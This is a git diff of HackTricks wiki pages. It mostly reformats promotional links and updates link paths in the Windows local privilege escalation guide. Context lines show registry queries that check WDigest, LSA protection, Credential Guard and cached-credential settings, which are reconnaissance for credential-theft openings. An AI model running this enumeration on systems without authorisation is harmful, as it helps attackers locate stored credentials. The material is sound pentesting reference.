-<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>
+<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

 </details>
--- a/windows-hardening/stealing-windows-credentials/windows-credentials-protections.md
+++ b/windows-hardening/stealing-windows-credentials/windows-credentials-protections.md
@ -1,4 +1,4 @@
-# Credentials Protections
+# Windows Credentials Protections

 ## Credentials Protections

--- a/windows-hardening/windows-local-privilege-escalation/README.md
+++ b/windows-hardening/windows-local-privilege-escalation/README.md
@ -322,7 +322,7 @@ reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\Subs
 ### WDigest

 If active, **plain-text passwords are stored in LSASS** (Local Security Authority Subsystem Service).\
-[**More info about WDigest in this page**](../stealing-windows-credentials/windows-credentials-protections.md#wdigest).
+[**More info about WDigest in this page**](../stealing-credentials/credentials-protections.md#wdigest).

 ```
 reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential
@ -331,7 +331,7 @@ reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v Use
 ### LSA Protection

 Microsoft in **Windows 8.1 and later** has provided additional protection for the LSA to **prevent** untrusted processes from being able to **read its memory** or to inject code.\
-[**More info about LSA Protection here**](../stealing-windows-credentials/windows-credentials-protections.md#lsa-protection).
+[**More info about LSA Protection here**](../stealing-credentials/credentials-protections.md#lsa-protection).

 ```
 reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL
@ -340,7 +340,7 @@ reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL
 ### Credentials Guard

 **Credential Guard** is a new feature in Windows 10 (Enterprise and Education edition) that helps to protect your credentials on a machine from threats such as pass the hash.\
-[**More info about Credentials Guard here.**](../stealing-windows-credentials/windows-credentials-protections.md#credential-guard)
+[**More info about Credentials Guard here.**](../stealing-credentials/credentials-protections.md#credential-guard)

 ```
 reg query HKLM\System\CurrentControlSet\Control\LSA /v LsaCfgFlags
@ -349,7 +349,7 @@ reg query HKLM\System\CurrentControlSet\Control\LSA /v LsaCfgFlags
 ### Cached Credentials

 **Domain credentials** are used by operating system components and are **authenticated** by the **Local** **Security Authority** (LSA). Typically, domain credentials are established for a user when a registered security package authenticates the user's logon data.\
-[**More info about Cached Credentials here**](../stealing-windows-credentials/windows-credentials-protections.md#cached-credentials).
+[**More info about Cached Credentials here**](../stealing-credentials/credentials-protections.md#cached-credentials).

 ```
 reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT
@ -775,9 +775,9 @@ Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L

 ### Firewall Rules

-[**Check this page for Firewall related commands**](../basic-win-cmd-for-pentesters.md#firewall) **(list rules, create rules, turn off, turn off...)**
+[**Check this page for Firewall related commands**](../basic-cmd-for-pentesters.md#firewall) **(list rules, create rules, turn off, turn off...)**

-More[ commands for network enumeration here](../basic-win-cmd-for-pentesters.md#network)
+More[ commands for network enumeration here](../basic-cmd-for-pentesters.md#network)

 ### Windows Subsystem for Linux (wsl)